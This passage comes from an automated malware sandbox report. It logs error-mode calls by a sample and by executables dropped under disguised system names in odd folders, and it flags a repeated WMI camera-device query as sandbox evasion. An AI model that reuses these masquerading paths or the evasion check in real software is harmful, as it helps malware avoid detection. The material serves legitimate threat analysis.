Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\lv961v43L3.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\SystemSettings.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
